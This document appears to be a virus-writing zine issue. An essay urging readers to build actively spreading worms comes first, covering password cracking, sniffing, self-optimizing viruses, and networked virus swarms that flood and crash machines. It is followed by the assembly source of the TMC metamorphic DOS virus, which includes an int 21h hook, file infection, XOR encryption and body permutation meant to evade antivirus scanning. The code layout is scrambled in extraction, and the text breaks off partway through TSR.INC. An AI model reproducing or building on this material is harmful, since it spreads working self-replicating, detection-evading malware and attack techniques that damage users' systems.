I agreed with Navrhar to write some real hard-core sci-fi about future of viruses that can be. I bring you some ideas that can be really good, if you can write 'em. I have no time left for it, Navrhar has no morale anymore for it. But all of them we solved already some time ago, but you should think about them for your own and you can be really smashing. Thats the reason I decided to write something about it: everyone is coding yetanother-poly-windows-pe-outlook-worm. Aren't you bored of it? All the time replicating some already present ideas? Don't you want to develop something really new. Here we have some ideas that are userfull and realiseable. Do it on your own...
Active internet/networking support Did you ever thing why the worms are so successful? Because users are now more sending a emails or uses internet instead of copying exe files to floppies for someone else. But current worms are really stupid. They just send themself to someone else (all of todays mail worms) and hopes there is some stupid user that will run it. Isn't it crazy? It something like writing in email: "send me to someone else, i'm a virus and i want to be spread". Stupid, isn't it? Do you really need a stupid users? You can do many things by your own. But you have to know how, of course. For this reason I recomend you to study a networking a bit, some easier protocols like http, ftp, smtp, telnet. Under windows you can do anything, you can filter 'em just like a real sniffer to get some passwords, you can also install a sniffer and filter all the traffic on your network. If you have some jokers in your hands you can start spreading oneself actively (not a passive as everyone does it now). You can install yourself on remote servers, you can map someone else's disks and infect them, you can infect pages on web-server by your own, you can take your future in your hands? So why you don't?
Self-optimizing performace Viruses are usualy stupid - they do the same things all the time. They, for example, infects like crazy, or will not notice that user is searching for them. But you can monitor all this, you can learn all this. How? Well, i've seen using neural network for nothing - just to be there - but it you are wise, you can use them for real, not wasting a space like someone else: you can learn how user acts on his computer, and you can notice then if he has some suspection, or what is he doing! Because your virus can self-optimize himself to do that. But not only neural nets are good for it - did you think about genetic model? Yeah, virus navrhar is ready for it, but do not performs it. Pitty. But you can create modular structure (each of them coresponded to one gene, for example) and ty supply a lot of other genes and let them optimize its own performace by Darwin's evolution in the wild. It can best show you how the virus should be coded to be good - because only good ones will surrive (you your code will be bug-free, of course). Be inventive - era of old viruses is in the past, to be best, you have to be dynamic, adaptive, protable, and wise.
Reentrable filetargets
It is easy to implement and is very effective - try to write all your infection routines reentrantely, so you can combine them any way: have you ever heard about exe file beeing infected, that was inserted as an attachment into word document (ole2 structure filesystem), that was compressed using zip, send over email, ascii armored with base64 encoding? It is simple, and very effective. Today it is still harder to find some suitable infection target, but it is so easy - if you can combine your access functions, you can call them whatever way you want, and you can easily do the important things. All is needed not to have a local variables fixed, but a dynamic. Go ahead...
Password hijacking It is very old technique, still used by hackers and still efective. You can usualy access password files. But they are one-way encrypted, and if you want to use some other accounts - for active inet support on some unix servers, for example, you need to know the passwords. So you can hack them. It can be done also for WinNT password file. Because passwords are one-way encrypted, and for verifying only a encrypted forms are compared, all you need is to test all the words you can imagine to encrypt it and to try if it matches. Then - goal, and you can do what you want as you know a password. But it tooks a lot of time. Well, if you are on some users machine, you are there for weeks or even months. You can use the time when user is not using cpu (which is usualy quite often) and test them like a hell. Also, you can use some password files. It is not possible to take some with you, as they ar usualy some megs long, but you can download them from the internet (easily using http protocol), or you can use some pages downloaded from internet and test all the words there - because users usualy sets a passwords simmilar to what they like. And they also browses pages what they like as well. So the password can be also on them like a regular word...
Multiplatform Last thing I want to mention is a multi-platform support. It is not yet fully supported at all. Navrhar virus and Anarchy does it in some way but not completely. Because there are many operating subsystems (call it this way) that gaves you opportunity to surrive. You can use them all to surf from onw target to another. For example, it is good to be an exe-virus, as you can do many things, but documents are mostly copied, instead of exe files. So you need a ole2 support to transfer itself elsewhere. But not only this. You can switch yourself to vbscript, to spread itself through html. And I can continue listing these features for some time as well, but you can guess some by your own, don't you?
Community born to communicate Everyone thinks about virus like a single entity. But it isn't, in nowadays world when all is connected to be able to communicate, so why viruses don't? Why not to use active copies of viruses to communicate through internet to exchange userful infromations, genes, for example, or distrubute updates. If you can do this - it is no more single virus but a whole community that can do wonderfull things: for example couple of entities knows each other. If one of them dies, others will know about it - and they can brute-attack target machine to infect it, to flood it and to crash it (easy with win ;) A new horizonts are waiting, so don't be affraid and go straight ahead! Flush
Hello hello guys! I got an oportunity to show you some older my program known as TMC. It means Tiny Mutation Compiler - because it is a mutation compiler. My virii is not a hard-coded in fact but it is recompiled for each run by a compiler from a pseudo-code given. So every time it might looks different. And it looks different. The idea is very simple: there is no need to code large and av-proof decryptors just to permutate your own body. That what TMC does. But you can't change your body anyway you want. You need some rules, here in my sources, all virus instructions are enclosed in macro brackets whose generates a pseudo-code. It contains normal opcodes and some neccessary flags, instruction length and other info needed for linking (see my macros - they explain it all). For first generation a "starter" (first generation compiler) must be used, that is included too. In others, there is only a compiler core in file which is also permutated and encrypted pseudocode. To run virus, it must be compiled at first. Also used compiler is also written in pseudocode so it can be replicated too.
Compilation (btw: it is more like a linking than a compilation) is easy: instructions are placed whereever in compiled buffer, connected with jumps and conditional jumps (they are followed with 3xNOP for worst case of linking, as you know from one-pass compilation same as is here). If given chunk is a data or label, it is remembered in linker as a label. If it is a instruction that refers it (jump or memory access), a correct address is placed from linkere there. So instruction flow can be breaked at any point and memory-access addresses, jump address will differ a lot. And this is body permutation, as you can see: no scanstring can be choosed, because there is always risk of breaking instructions within scanstring, and any jumps may be placed there. And heuristic can't wait until it is whole compiled. Thats it. Enjoy my sources and be happy. ender Download source code of TMC:Level_6x9 here
STARTER.ASM
code
JMPS
jumps segment para public use16 'CODE' assume cs:code, ds:code org 100h EQU
0FFFFh
;pravdepodobnost na rozdelenie kodu
include macros.inc
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ ; ÚÙÚÙ ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ start: mov ds:out_block_ofs, offset out_block_table mov ds:data_relo_ofs, offset data_relo_table mov ds:jmp_relo_ofs, offset jmp_relo_table mov mov call mov call call mov jmp
si, offset src_startup bx, offset free compile si, offset src_vir compile link word ptr cs:[free + 2], offset free free ;³ ;³ ;³
ANALYZER
³; ³; ³;
;³ Input: SI - source ;³ BX - output ;³ Output: BX - end of code compile: cld mov xor next_in_block: add lodsb or jz cmp jae cmp jbe sub jmp code_cmd: cmp jnz mov jmp
di, offset in_block_table ax, ax
si, ax al, al end_in_block al, M_CODE code_cmd al, MAX_CODE_SIZE next_in_block al, MAX_CODE_SIZE next_in_block
al, M_STOP no_stop al, 0 next_in_block
no_stop: cmp jnz mov
al, M_BLOCK no_block ax, si
STARTER.ASM
dec stosw mov stosw mov jmp no_block: mov jmp end_in_block: lea shr shr mov xor stosw
ax ax, 0FFFFh ax, 2 next_in_block ;M_RELO & M_J* al, 2 next_in_block
ax, [di + (-(offset in_block_table))] ax, 1 ax, 1 cs:num_of_blocks, ax ax, ax
;³ ;³ ;³ mov mov jmp next_block: mov call shl shl add mov
COMPILER
³; ³; ³;
di, offset in_block_table si, [di] first_no_find
bp, cs:num_of_blocks rnd_max ax, 1 ax, 1 ax, offset in_block_table di, ax
next_search_block: add di, 4 mov si, [di] or si, si jnz no_last_block mov di, offset in_block_table mov si, [di] no_last_block: cmp jnz cmp jnz jmp
byte ptr ds:[si], M_STOP no_stoped di, ax next_search_block no_next_block
no_stoped: first_no_find: cmp jz
word ptr ds:[di+2], 0FFFFh no_jmp_constr
push mov mov stosb mov dec dec
di di, [di+2] al, 0e9h ax, bx ax ax
STARTER.ASM
sub stosw pop no_jmp_constr: next_inst: lodsb cmp jz
ax, di di
al, M_STOP no_next_inst
cmp ja
al, MAX_CODE_SIZE no_break
push mov call or pop jz
ax bp, JMPS rnd_max ax, ax ax no_last_but_end
no_break: cmp jz cmp jae cmp jbe sub
al, M_STOP no_next_inst al, M_CODE code_cmd1 al, MAX_CODE_SIZE no_sub_size_data al, MAX_CODE_SIZE
no_sub_size_data: xor cx, cx mov cl, al push di mov di, bx rep movsb mov bx, di pop di jmp next_inst code_cmd1: cmp jnz push mov mov dec dec stosw lodsw stosw mov pop jmp no_relo1: cmp jnz push mov mov
al, M_RELO no_relo1 di di, data_relo_ofs ax, bx ax ax
data_relo_ofs, di di next_inst
al, M_BLOCK no_block1 di di, out_block_ofs ax, bx
STARTER.ASM
stosw lodsw stosw mov cmp jnz
out_block_ofs, di ax, src_src no_put_src
push mov mov mov rep mov pop
si di, bx si, offset src cx, offset src_end - offset src movsb bx, di si
no_put_src: pop lodsb jmp no_block1: push mov mov stosw lodsw stosw mov pop mov add cmp jb inc inc jmp
di no_break ;M_J* ax di di, jmp_relo_ofs ax, bx
jmp_relo_ofs, di di ax [bx], al bx, 3 al, M_J_COND next_inst bx bx next_inst
no_last_but_end: mov [di+2], bx add bx, 3 no_next_inst: dec mov jmp
si [di], si next_block
no_next_block: ret ;³ ;³ ;³
JUMP RELOCATOR
³; ³; ³;
link: mov mov sub shr shr next_jmp_relo: lodsw
si, cx, cx, cx, cx,
offset jmp_relo_table jmp_relo_ofs si 1 1
STARTER.ASM
push lodsw push
ax
mov mov sub shr shr
si, cx, cx, cx, cx,
cx si offset out_block_table out_block_ofs si 1 1
next_jmp_in_out: cmp ax, [si + 2] jz jmp_found add si, 4 loop next_jmp_in_out int 3 mov
bp, 0DEEDh
push pop mov mov int mov int
cs ds dx, offset jump_not_found ah, 9 21h ah, 4ch 21h
jmp_found: mov pop pop mov cmp jb sub inc push sub dec cmp jg cmp jl mov inc mov mov pop jmp over_jmp: pop dec xor inc mov inc mov
dx, [si] si cx bx al, [bx] al, M_J_COND jmp1 byte ptr [bx], 0F0h - 070h bx dx dx, bx dx dx, 127 over_jmp dx, -128 over_jmp [bx], dl bx word ptr [bx], 09090h byte ptr [bx+2], 090h dx next_j_relo
dx bx byte ptr [bx], 1 bx byte ptr [bx], 3 bx al, 0E9h
jmp1: mov
byte ptr [bx], al
STARTER.ASM
inc sub dec dec mov next_j_relo: loop
bx dx, bx dx dx [bx], dx
next_jmp_relo ;³ ;³ ;³
mov mov sub shr shr
si, cx, cx, cx, cx,
DATA RELOCATOR
³; ³; ³;
offset data_relo_table data_relo_ofs si 1 1
next_data_relo: lodsw push ax lodsw push cx si mov mov sub shr shr
si, cx, cx, cx, cx,
offset out_block_table out_block_ofs si 1 1
next_data_in_out: cmp ax, [si + 2] jz found add si, 4 loop next_data_in_out int 3 mov
bp, 0DEADh
push pop mov mov int mov int
cs ds dx, offset data_not_found ah, 9 21h ah, 4ch 21h
mov pop pop sub mov loop
ax, [si] si cx bx ax, offset free [bx], ax next_data_relo
found:
ret
rnd: push in
cx al, 40h
STARTER.ASM
mov mov in ror xor mov pop ret last_rnd
ah, al cl, al al, 40h ax, cl ax, cs:last_rnd cs:last_rnd, ax cx
dw
0DEADh
rnd_max:
;
or jz push call mov xor div xchg pop ret
bp, bp rnd_max_0 dx rnd ax, 1 dx, dx bp ax, dx dx
rnd_max_0: xor ret
ax, ax
num_of_blocks out_block_ofs data_relo_ofs jmp_relo_ofs
dw dw dw dw
0 0 0 0
data_not_found jump_not_found
db db
'Error in link data', 13, 10, '$' 'Error in link jump', 13, 10, '$'
include src\main.inc in_block_table: dd 100h out_block_table: dd 100h data_relo_table: dd 100h jmp_relo_table: dd 100h free: code
ends end
start
dup(?) dup(?) dup(?) dup(?)
COMPILER.INC
;DEBUG_SIZES = 1 @last_rnd @out_block_ofs @jump_relo_ofs @data_relo_ofs @num_of_blocks in_mem_ofs new_vir_size
EQU EQU EQU EQU EQU EQU EQU
2 4 6 8 0ah 0ch 0eh
@in_block_table @out_block_table @jump_relo_table @data_relo_table @free
EQU EQU EQU EQU EQU
0010h @in_block_table + 104h + 4 @out_block_table + 1B0h @jump_relo_table + 2e0h @data_relo_table + 188h
;³ ;³ ;³
ANALYZER
³; ³; ³;
I<
mov
word ptr es:[in_mem_ofs], 0
>
I< I< I<
mov mov mov
word ptr es:[@out_block_ofs], @out_block_table word ptr es:[@jump_relo_ofs], @jump_relo_table word ptr es:[@data_relo_ofs], @data_relo_table
> > >
I< RELO I< I<
lea src_src push mov JUMP
si, [bp + 1234h]
>
si bx, @free @compile
> >
BLOCK I< I<
@compile mov di, @in_block_table xor ax, ax JUMP @next_in_block
BLOCK I<
@next_in_block add si, ax CALLL read_byte or al, al _JZ @end_in_block cmp al, M_CODE _JAE @code_cmd cmp al, MAX_CODE_SIZE _JBE @next_in_block sub al, MAX_CODE_SIZE JUMP @next_in_block
I< I< I< I<
BLOCK I< I<
BLOCK I< I< I< I< I<
@code_cmd cmp al, M_STOP _JNZ @no_stop mov al, 0 JUMP @next_in_block @no_stop cmp al, M_BLOCK _JNZ @no_block mov ax, si dec ax stosw mov ax, 0FFFFh
> >
> > > > >
> >
> > > > >
COMPILER.INC
I< I<
stosw mov JUMP
> >
BLOCK I<
@no_block mov al, 2 JUMP @next_in_block
BLOCK I< ifdef I< endif I< I< I< I< I<
@end_in_block lea ax, [di + (-(@in_block_table))] DEBUG_SIZES int 3
>
shr shr mov xor stosw
> > > > >
ax, 2 @next_in_block ;M_RELO & M_J*
>
ax, 1 ax, 1 es:[@num_of_blocks], ax ax, ax
;³ ;³ ;³
COMPILER
³; ³; ³;
I< I<
mov mov JUMP
BLOCK I< I<
@next_block push bp mov bp, es:[@num_of_blocks] CALLL @rnd_max pop bp shl ax, 1 shl ax, 1 add ax, @in_block_table mov di, ax JUMP @next_search_block
I< I< I< I< I<
BLOCK I< I< I< I< I<
BLOCK I< I< I< I< I<
BLOCK I< I<
di, @in_block_table si, es:[di] @no_stoped
@next_search_block add di, 4 mov si, es:[di] or si, si _JNZ @no_last_block mov di, @in_block_table mov si, es:[di] JUMP @no_last_block @no_last_block push ax CALLL read_byte dec si cmp al, M_STOP pop ax _JNZ @no_stoped cmp di, ax _JNZ @next_search_block JUMP @no_next_block @no_stoped mov ax, es:[di+2] cmp ax, 0FFFFh _JZ @next_inst
>
> >
> > > > > > >
> > > > >
> > > > >
> >
COMPILER.INC
I< I< I< I< I< I< I< I< I< I<
push mov mov stosb mov dec dec sub stosw pop JUMP
BLOCK
@next_inst CALLL read_byte cmp al, M_STOP _JZ @no_next_inst
I<
di di, ax al, 0e9h ax, bx ax ax ax, di di @next_inst
> > > > > > > > > >
>
I<
cmp _JA
al, MAX_CODE_SIZE @no_break
>
I< I< I< RELO
push push mov @JMPS CALLL or pop pop _JZ JUMP
ax bp bp, [bp + 1234h]
> > >
I< I< I<
BLOCK I< I< I< I<
@rnd_max ax, ax bp ax @no_last_but_end @no_break
@no_break cmp al, M_STOP _JZ @no_next_inst cmp al, M_CODE _JAE @code_cmd1 cmp al, MAX_CODE_SIZE _JBE @no_sub_size_data sub al, MAX_CODE_SIZE JUMP @no_sub_size_data
BLOCK I< I< I< I<
@no_sub_size_data xor cx, cx mov cl, al push di mov di, bx JUMP @copy_next_byte
BLOCK
@copy_next_byte CALLL read_byte stosb dec cx _JNZ @copy_next_byte mov bx, di pop di JUMP @next_inst
I< I< I< I<
BLOCK I<
@code_cmd1 cmp al, M_RELO _JNZ @no_relo1
> > >
> > > >
> > > >
> > > >
>
COMPILER.INC
I< I< I< I< I< I< I< I< I<
push mov mov dec dec stosw CALLL stosw mov pop JUMP
di di, es:[@data_relo_ofs] ax, bx ax ax read_word es:[@data_relo_ofs], di di @next_inst
BLOCK I<
@no_relo1 cmp al, M_BLOCK _JNZ @no_block1
I< I< I< I<
push mov mov stosw CALLL stosw mov cmp _JNZ
I< I< I<
di di, es:[@out_block_ofs] ax, bx
es:[@out_block_ofs], di ax, src_src @no_put_src
push mov lea src_src mov rep mov pop JUMP
BLOCK I<
@no_put_src cmp ax, text_text _JNZ @no_put_text
I< I< RELO
mov cmp @JMPS _JAE CALLL sub mov add JUMP
BLOCK I< I< RELO I< I< I<
BLOCK
> > >
>
> > > >
read_word
I< I< I< RELO I< I< I< I<
I< I< I<
> > > > > >
> > >
si di, bx si, [bp + 1234h]
> > >
cx, offset src_end - offset src movsb bx, di si @no_special
> > > >
ax, NO_TEXT word ptr [bp + 1234h], ax @no_special read_byte al, MAX_CODE_SIZE ah, 0 si, ax @no_special
@no_put_text cmp ax, @JMPS _JNZ @no_special mov ax, [bp + 1234h] @JMPS dec ax cmp ax, MIN_JMPS _JAE jmps_no_over mov ax, MAX_JMPS JUMP jmps_no_over jmps_no_over
>
> >
> > >
> > > > >
COMPILER.INC
I< I< I<
mov add add JUMP
BLOCK I<
@no_special pop di CALLL read_byte JUMP @no_break
BLOCK I< I< I< I< I<
@no_block1 push ax push di mov di, es:[@jump_relo_ofs] mov ax, bx stosw CALLL read_word stosw mov es:[@jump_relo_ofs], di pop di pop ax mov es:[bx], al add bx, 3 cmp al, M_J_COND _JB @next_inst inc bx inc bx JUMP @next_inst
I< I< I< I< I< I< I< I< I<
es:[bx], ax bx, 2 si, 3 @no_special
> > >
>
;M_J* > > > > > > > > > > > > > >
BLOCK I< I<
@no_last_but_end mov es:[di+2], bx add bx, 3 JUMP @no_next_inst
> >
BLOCK I< I<
@no_next_inst dec si mov es:[di], si JUMP @next_block
> >
BLOCK I<
@no_next_block cmp word ptr es:[in_mem_ofs], 0 _JNZ @link pop si mov es:[in_mem_ofs], bx add si, offset src_vir - offset src_startup JUMP @compile
I< I< I<
;³ ;³ ;³
JUMP RELOCATOR
> > > >
³; ³; ³;
BLOCK I< I< I< I<
@link push pop sub mov
I< I< I< ifdef I<
mov si, @jump_relo_table mov cx, ds:[@jump_relo_ofs] sub cx, si DEBUG_SIZES ;check out_block in es:[4] int 3
es ds bx, @free ds:[new_vir_size], bx
> > > > > > > >
COMPILER.INC
endif I< I<
shr shr JUMP
cx, 1 cx, 1 @next_jump_relo
BLOCK I< I< I< I< I<
@next_jump_relo lodsw push ax lodsw push cx push si
I< I< I< I< I<
mov mov sub shr shr JUMP
BLOCK I<
@next_jmp_in_out cmp ax, [si + 2] _JZ @jmp_found add si, 4 dec cx _JNZ @next_jmp_in_out
I< I<
si, @out_block_table cx, ds:[@out_block_ofs] cx, si cx, 1 cx, 1 @next_jmp_in_out
ifdef I< I< endif
DEBUG mov int 3
BLOCK I< I< I< I< I< I<
@jmp_found mov dx, [si] pop si pop cx pop bx mov al, [bx] cmp al, M_J_COND _JB @jmp1
I< I< I< I< I< I<
sub inc push sub dec cmp _JG cmp _JL mov inc mov mov pop JUMP
I< I< I< I< I< I<
BLOCK I< I< I< I< I<
bp, 0DEEDh
byte ptr [bx], 0F0h - 070h bx dx dx, bx dx dx, 127 @over_jmp dx, -128 @over_jmp [bx], dl bx word ptr [bx], 09090h byte ptr [bx+2], 090h dx @next_j_relo
@over_jmp pop dx dec bx xor byte ptr [bx], 1 inc bx mov byte ptr [bx], 3
> >
> > > > > > > > > >
> > >
> >
> > > > > >
> > > > > > > > > > > >
> > > > >
COMPILER.INC
I< I<
inc mov JUMP
bx al, 0E9h @jmp1
> >
BLOCK I< I< I< I< I< I<
@jmp1 mov inc sub dec dec mov JUMP
byte ptr [bx], al bx dx, bx dx dx [bx], dx @next_j_relo
> > > > > >
BLOCK I<
@next_j_relo dec cx _JNZ @next_jump_relo ;³ ;³ ;³
DATA RELOCATOR
>
³; ³; ³;
I< I< I< ifdef I< endif I< I<
mov si, @data_relo_table mov cx, ds:[@data_relo_ofs] sub cx, si DEBUG_SIZES int 3
> > >
shr shr JUMP
> >
BLOCK I< I< I< I< I<
@next_data_relo lodsw push ax lodsw push cx push si
I< I< I< I< I<
mov mov sub shr shr JUMP
BLOCK I<
@next_data_in_out cmp ax, [si + 2] _JZ @found add si, 4 dec cx _JNZ @next_data_in_out
I< I<
ifdef I< I< endif
DEBUG mov int 3
BLOCK I< I< I< I<
@found mov pop pop pop
cx, 1 cx, 1 @next_data_relo
si, @out_block_table cx, ds:[@out_block_ofs] cx, si cx, 1 cx, 1 @next_data_in_out
>
> > > > > > > > > >
> > >
bp, 0DEADh
> >
ax, [si] si cx bx
> > > >
COMPILER.INC
I< I< I<
sub mov dec _JNZ JUMP
ax, @free [bx], ax cx @next_data_relo end_of_compile
> > >
MAIN.INC
;DEBUG = 1 START_JMPS NO_TEXT BAD_CLEAN MIN_JMPS MAX_JMPS
EQU EQU EQU EQU EQU
50 20 20 5 100
mem4compile ;
EQU
(8000d + @free) / 10h ^^^^ maximalny najvecsi vystupny kod
@next_in_block @code_cmd @no_stop @no_block @end_in_block @next_block @next_search_block @no_last_block @no_stoped @next_inst @no_break @no_sub_size_data @code_cmd1 @no_relo1 @no_put_src @no_block1 @no_last_but_end @no_next_inst @no_next_block @next_jump_relo @next_jmp_in_out @jmp_found @over_jmp @jmp1 @next_j_relo @next_data_relo @next_data_in_out @found @rnd @rnd_max @rnd_max_0 @copy_next_byte @no_special @JMPS @no_put_text
EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU
3000 3001 3002 3003 3004 3005 3006 3007 3008 3009 3010 3011 3012 3013 3014 3015 3016 3017 3018 3019 3020 3021 3022 3023 3024 3025 3026 3027 3028 3029 3030 3050 3051 3052 3053
exit save_ds vir_size ofs_in_mem
EQU EQU EQU EQU
3054 3055 3056 3057
int24 no_inf_int24 end_of_compile _old_ip clean_ofajc _old_inst
EQU EQU EQU EQU EQU EQU
6000 6001 6002 6003 6004 6006
jmps_no_over
EQU
3061
crypt_data
EQU
3070
MAIN.INC
crypt_next_byte
EQU
3071
text_text
EQU
9000
xor_const xor_add save_ah
EQU EQU EQU
3031 3032 3033
read_byte read_word
EQU EQU
3040 3041
filetype old_cs old_ss old_ip old_sp exe_infect set_marker exe_header install old_entry infect
EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU
5000 5001 5002 5003 5004 5005 5006 5007 5008 5009 5010
min_mem max_mem old_max_mem write_exeh str_start prepare_str max_mem_FFFF infect_floppy no_drive_pressed infect_close handle path psp push_all pop_all int24_seg int24_ofs init_int24 deinit_int24 call_int21 infect_in_close infect_and_call_int21 exit_adr check4handle new_psp ticks no_short_exe no_com_ojeb
EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU
5011 5012 5013 5014 5015 5016 5017 5018 5019 5020 5021 5022 5023 5024 5025 5026 5027 5028 5029 5030 5032 5033 5034 5035 5036 5037 5038 5039
@compile @link
EQU EQU
4000 4001
src_src int21 old21
EQU EQU EQU
1221 0200 0201
file_ok close no_inf
EQU EQU EQU
0240 0250 0251
MAIN.INC
time date
EQU EQU
0300 0301
old_prog
EQU
0101
_start in_mem
EQU EQU
0000 0102
old_inst
EQU
8000
;============================ CODE ====================================== src: src_startup: BLOCK _start ; lea bp, [1234h] I< dw 02e8dh, 1234h > I< cld > I< I< RELO I< I< I< I< I< I< I< RELO
mov mov save_ds dec mov mov cmp _JB push pop mov max_mem
I< RELO I< I<
mov min_mem mov int _JC
I< I< RELO I< RELO I< I<
mov mov max_mem sub min_mem dec cmp _JB int _JC mov add
I< I< I<
ax, ds word ptr [bp+1234h], ax
> >
ax ds, ax ax, word ptr ds:[3] ax, 1900h exit cs ds word ptr [bp+1234h], ax
> > > >
bx, word ptr [bp+1234h]
>
ah, 4ah 21h exit
> >
ah, 48h bx, word ptr [bp+1234h]
> >
bx, word ptr [bp+1234h]
>
bx bx, mem4compile exit 21h exit es, ax word ptr es:[@last_rnd], 06942h
> >
> > >
> > >
include src\compiler.inc BLOCK I< RELO I< RELO I< I< I<
end_of_compile mov ax, [bp+1234h] save_ds mov cx, [bp+1234h] old_ss add cx, 10h add cx, ax push cx
> > > > >
MAIN.INC
I< RELO I< RELO I< I< I< I< RELO I< I< RELO I< I< I< RELO
push word ptr [bp+1234h] old_sp mov cx, [bp+1234h] old_cs add cx, 10h add cx, ax push cx push word ptr [bp+1234h] old_ip push ax push word ptr [bp + 1234h] old_max_mem push ds mov cl, 0 cmp byte ptr [bp+1234h], cl filetype _JNZ install
>
I< RELO I< I< I< I<
lea si, [bp+1234h] old_inst mov ax, cs:[si] mov word ptr cs:[100h], ax mov al, cs:[si+2] mov byte ptr cs:[102h], al JUMP install
>
BLOCK I< RELO I< RELO I< I< I< I< RELO I< RELO I< I< I< I< RELO I< I< RELO I< I< I< RELO
clean_ofajc mov ax, [bp+1234h] save_ds mov cx, [bp+1234h] old_ss add cx, 10h add cx, ax push cx push word ptr [bp+1234h] old_sp mov cx, [bp+1234h] old_cs add cx, 10h add cx, ax push cx push word ptr [bp+1234h] _old_ip push ax push word ptr [bp + 1234h] old_max_mem push ds mov cl, 0 cmp byte ptr [bp+1234h], cl filetype _JNZ install
I< RELO I< I< I< I<
lea si, [bp+1234h] _old_inst mov ax, cs:[si] mov word ptr cs:[100h], ax mov al, cs:[si+2] mov byte ptr cs:[102h], al JUMP install
BLOCK I<
install xor ax, ax
> > > > > > > > > >
> > > >
> > > > > > > > > > > > > > > >
> > > > >
>
MAIN.INC
I< I<
mov cmp _JZ
ds, ax byte ptr ds:[501h], 10h old_prog
> >
ifndef I< endif
DEBUG mov
byte ptr ds:[501h], 10h
>
I< I<
push pop
es ds
> >
I< I< I< RELO I< I< RELO I< I< I<
mov ax, ds:[in_mem_ofs] sub ax, @free mov [bp+1234h], ax ofs_in_mem mov cx, ds:[new_vir_size] mov [bp+1234h], cx vir_size mov si, @free xor di, di rep movsb
> > >
I< I< I< I< RELO I< RELO I< I< I< I<
mov shr inc mov max_mem sub min_mem sub dec dec cmp _JB mov int _JC mov mov int _JC
cl, 4 di, cl di bx, [bp+1234h]
> > > >
bx, [bp+1234h]
>
bx, di bx bx bx, di old_prog ah, 4ah 21h old_prog bx, di ah, 48h 21h old_prog
> > > >
I< I< I< I< I<
dec mov mov inc mov
ax es, ax word ptr es:[1], 8 ax es, ax
> > > > >
I< RELO I< I< I<
mov cx, [bp+1234h] vir_size xor si, si xor di, di rep movsb
> > >
I<
push
>
I< RELO I< RELO I< RELO
push word ptr [bp + 1234h] ofs_in_mem mov al, [bp + 1234h] xor_const mov ah, [bp + 1234h] xor_add
I< I< I< I< I<
es
> > > > >
> > > > >
>
> > >
MAIN.INC
I<
retf
BLOCK I< I<
exit mov int
BLOCK I< I< ;I< I< I< ;I< I< I< I< I< I< I<
@rnd push in mov mov in mov xor mov rol mov pop ret
BLOCK I<
;I< I< I< I< I< I<
@rnd_max or bp, bp _JZ @rnd_max_0 push dx CALLL @rnd mov ax, 1 xor dx, dx div bp xchg ax, dx pop dx ret
BLOCK I< I<
@rnd_max_0 xor ax, ax ret
BLOCK I< RELO I< I< I< RELO I< RELO I< RELO I< I< RELO I< I<
read_byte mov [bp + 1234h], ah save_ah mov ax, si sub ax, bp sub ax, 1234h src_src mul word ptr [bp + 1234h] xor_add add al, [bp + 1234h] xor_const xor al, ds:[si] mov ah, [bp + 1234h] save_ah inc si ret
BLOCK
I< I<
read_word CALLL read_byte mov ah, al CALLL read_byte xchg al, ah ret
BLOCK I<
old_prog pop es
I<
I<
>
ax, 4c00h 21h
> >
cx al, 40h al, 0 ah, al al, 40h al, 0 ax, es:[@last_rnd] cl, ah ax, cl es:[@last_rnd], ax cx
> > > > > > > > > > > >
> > > > > > > >
> >
> > > > > > > > > >
> > >
>
MAIN.INC
I< I< I< I< I< I< I< I<
mov int pop pop mov mov mov int
ah, 21h bx ax ds, es, ah, 21h
49h
I< RELO I< I< I< I<
lea bx, [bp + 1234h] old_entry pop ax mov cs:[bx+1], ax pop ax mov cs:[bx+3], ax
>
I< I< I<
pop pop mov JUMP
> > >
BLOCK D<
old_entry db 0EAh, 0, 0, 0, 0
ax ax 4ah
ax ss sp, ax old_entry
> > > > > > > >
> > > >
>
;============================ DATA ====================================== BLOCK save_ah D< db 0 > BLOCK @JMPS D< dw START_JMPS > BLOCK xor_const D< db 0 > BLOCK xor_add D< dw 0 > BLOCK filetype D< db 0 > BLOCK old_inst D< db 0c3h, 0, 0 > BLOCK _old_inst D< db 0c3h, 0, 0 > BLOCK old_cs D< dw -10h > BLOCK old_ss D< dw -10h > BLOCK old_ip D< dw 100h > BLOCK _old_ip D< dw 100h > BLOCK old_sp D< dw 0fffeh > BLOCK min_mem D< dw 1000h > BLOCK old_max_mem D< dw 0ffffh > BLOCK max_mem D< dw 0 > BLOCK save_ds D< dw 0 > BLOCK vir_size D< dw 0 > BLOCK ofs_in_mem D< dw 0 > BLOCK src_src
MAIN.INC
db
M_STOP, M_END
;============================ CODE ====================================== src_vir: BLOCK in_mem I< xor bp, bp > I< mov ds, bp > I< mov bx, ds:[46Dh] > I< push cs > I< pop ds > I< and bx, 0FFF0h > I< mov ds:[1234h], bx > RELO ticks CALLL crypt_data CALLL @rnd I< mov ds:[1234h], al > RELO xor_const I< mov ds:[1234h], ah > RELO xor_add CALLL crypt_data I< mov ax, 3521h > I< int 21h > I< mov di, 1234h > RELO old21 I< mov word ptr ds:[di], bx > I< mov word ptr ds:[di+2], es > I< mov dx, 1234h > RELO int21 I< mov ax, 2521h > I< int 21h > JUMP old_prog BLOCK I< RELO I<
crypt_data mov si, 1234h src_src mov cx, offset src_end - offset src JUMP crypt_next_byte
BLOCK I< I< I< I<
crypt_next_byte xor ds:[si], al inc si add al, ah dec cx _JNZ crypt_next_byte ret
I<
> >
> > > > >
include src\tsr.inc ;============================ DATA ====================================== BLOCK text_text D< db 13, 10, 13, 10, 'þ TMC 1.0 by Ender þ', 13, 10, 'Welcome to the Tiny Mutation Compiler!', 13, 10, 'Dis is level 6*9.', 13, 10, 'Greetings to virus makers: Dark Avenger, Vyvojar, SVL, Hell Angel', 13, 10, 'Personal greetings: K. K., Dark Punisher',13, 10 , 13, 10 > db M_STOP, M_END src_end:
TSR.INC
;INFECT_ONLY_CMM_EXX = 1 BLOCK I< I< I< I< I<
int21 cld CALLL cmp _JZ cmp _JZ cmp _JZ cmp _JNZ JUMP
